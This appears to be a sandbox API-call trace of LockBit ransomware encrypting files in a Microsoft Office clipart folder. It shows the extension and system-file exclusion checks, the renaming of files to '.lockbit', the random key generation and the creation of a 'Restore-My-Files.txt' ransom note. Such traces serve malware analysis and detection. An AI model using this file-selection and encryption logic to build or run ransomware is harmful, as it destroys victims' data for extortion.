lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0112.971] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0112.971] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0112.971] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0112.971] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0112.971] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0112.971] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0112.971] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0112.971] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0112.971] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0112.971] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0112.971] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0112.971] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0112.971] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0112.971] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD01180_.WMF") returned 1 [0112.971] lstrcmpiW (lpString1="ntldr", lpString2="DD01180_.WMF") returned 1 [0112.971] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD01180_.WMF") returned 1 [0112.971] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD01180_.WMF") returned -1 [0112.972] lstrcmpiW (lpString1="autorun.inf", lpString2="DD01180_.WMF") returned -1 [0112.972] lstrcmpiW (lpString1="thumbs.db", lpString2="DD01180_.WMF") returned 1 [0112.972] lstrcmpiW (lpString1="iconcache.db", lpString2="DD01180_.WMF") returned 1 [0112.972] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0112.972] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned=".WMF" [0112.972] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0112.972] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0112.972] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0112.972] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0113.018] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0113.165] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0113.165] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0113.166] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0113.166] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0113.166] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0113.166] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0113.166] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0113.167] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0113.167] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0113.167] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0113.167] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0113.167] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0113.167] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0113.168] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0113.168] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0113.168] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0113.170] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0113.170] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0113.170] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0113.172] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0113.172] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0113.172] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0113.173] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0113.173] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF.lockbit") returned 72 [0113.173] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01180_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0113.177] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0113.177] malloc (_Size=0x40068) returned 0x1ff1e60 [0113.177] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=2084) returned 1 [0113.179] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.180] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.184] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0113.184] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.184] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.184] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0113.184] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.186] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0113.186] malloc (_Size=0xa6) returned 0x77d7a8 [0113.186] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0113.187] free (_Block=0x77d7a8) [0113.187] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0113.187] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0113.187] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0113.187] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x5a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD01181_.WMF", cAlternateFileName="")) returned 1 [0113.187] lstrcmpiW (lpString1=".", lpString2="DD01181_.WMF") returned -1 [0113.188] lstrcmpiW (lpString1="..", lpString2="DD01181_.WMF") returned -1 [0113.188] PathFindExtensionW (pszPath="DD01181_.WMF") returned=".WMF" [0113.188] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0113.188] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0113.188] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0113.188] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0113.188] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0113.188] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0113.188] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0113.188] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0113.188] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0113.188] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0113.188] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0113.188] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0113.188] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0113.188] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0113.188] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0113.188] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0113.188] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0113.188] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0113.188] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0113.188] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0113.189] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0113.189] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0113.189] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0113.189] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0113.189] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.189] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0113.189] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0113.189] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0113.189] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0113.189] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0113.189] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0113.189] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0113.189] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0113.189] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0113.189] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0113.189] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0113.189] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0113.189] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0113.189] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0113.189] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0113.189] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0113.189] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0113.189] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.190] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0113.190] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0113.190] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0113.190] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0113.190] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD01181_.WMF") returned 1 [0113.190] lstrcmpiW (lpString1="ntldr", lpString2="DD01181_.WMF") returned 1 [0113.190] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD01181_.WMF") returned 1 [0113.190] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD01181_.WMF") returned -1 [0113.190] lstrcmpiW (lpString1="autorun.inf", lpString2="DD01181_.WMF") returned -1 [0113.190] lstrcmpiW (lpString1="thumbs.db", lpString2="DD01181_.WMF") returned 1 [0113.190] lstrcmpiW (lpString1="iconcache.db", lpString2="DD01181_.WMF") returned 1 [0113.190] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0113.190] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned=".WMF" [0113.190] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0113.190] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0113.190] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0113.190] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0113.190] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0113.190] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0113.190] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0113.190] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0113.190] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0113.190] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0113.191] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0113.191] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0113.191] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0113.191] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0113.191] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0113.191] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0113.191] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0113.191] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0113.191] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0113.191] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0113.191] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0113.191] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0113.191] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0113.191] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0113.191] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0113.191] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0113.191] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0113.191] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0113.191] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF.lockbit") returned 72 [0113.191] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01181_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x340 [0113.195] CreateIoCompletionPort (FileHandle=0x340, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0113.195] malloc (_Size=0x40068) returned 0x3d70450 [0113.195] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=1448) returned 1 [0113.195] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.196] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.196] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0113.196] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.196] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.196] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0113.197] ReadFile (in: hFile=0x340, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0113.199] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0113.199] malloc (_Size=0xa6) returned 0x77d7a8 [0113.199] NtSetInformationFile (FileHandle=0x340, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0113.199] free (_Block=0x77d7a8) [0113.199] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0113.199] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0113.199] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0113.200] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xbb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD01182_.WMF", cAlternateFileName="")) returned 1 [0113.200] lstrcmpiW (lpString1=".", lpString2="DD01182_.WMF") returned -1 [0113.200] lstrcmpiW (lpString1="..", lpString2="DD01182_.WMF") returned -1 [0113.200] PathFindExtensionW (pszPath="DD01182_.WMF") returned=".WMF" [0113.200] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0113.200] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0113.200] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0113.200] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0113.200] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0113.200] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0113.200] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0113.200] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0113.200] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0113.200] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0113.200] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0113.200] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0113.200] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0113.200] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0113.200] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0113.201] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0113.201] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0113.201] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0113.201] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0113.201] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0113.201] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0113.201] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0113.201] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0113.201] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0113.201] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.201] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0113.201] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0113.201] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0113.201] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0113.201] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0113.201] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0113.201] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0113.201] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0113.201] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0113.201] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0113.201] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0113.201] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0113.202] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0113.202] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0113.202] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0113.202] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0113.202] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0113.202] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.202] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0113.202] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0113.202] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0113.202] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0113.202] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD01182_.WMF") returned 1 [0113.202] lstrcmpiW (lpString1="ntldr", lpString2="DD01182_.WMF") returned 1 [0113.202] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD01182_.WMF") returned 1 [0113.202] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD01182_.WMF") returned -1 [0113.202] lstrcmpiW (lpString1="autorun.inf", lpString2="DD01182_.WMF") returned -1 [0113.202] lstrcmpiW (lpString1="thumbs.db", lpString2="DD01182_.WMF") returned 1 [0113.202] lstrcmpiW (lpString1="iconcache.db", lpString2="DD01182_.WMF") returned 1 [0113.202] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0113.202] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned=".WMF" [0113.202] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0113.202] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0113.202] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0113.203] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0113.203] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0113.203] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0113.203] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0113.203] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0113.203] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0113.203] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0113.203] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0113.203] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0113.203] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0113.203] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0113.203] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0113.203] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0113.203] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0113.203] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0113.203] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0113.203] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0113.203] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0113.203] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0113.203] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0113.203] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0113.204] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0113.204] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0113.204] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0113.204] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0113.204] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF.lockbit") returned 72 [0113.204] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01182_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0113.204] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0113.204] malloc (_Size=0x40068) returned 0x3e70008 [0113.204] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=2996) returned 1 [0113.205] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.205] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.205] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0113.205] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.206] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.206] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0113.206] ReadFile (in: hFile=0x81c, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0113.211] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0113.211] malloc (_Size=0xa6) returned 0x77d7a8 [0113.211] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0113.212] free (_Block=0x77d7a8) [0113.212] 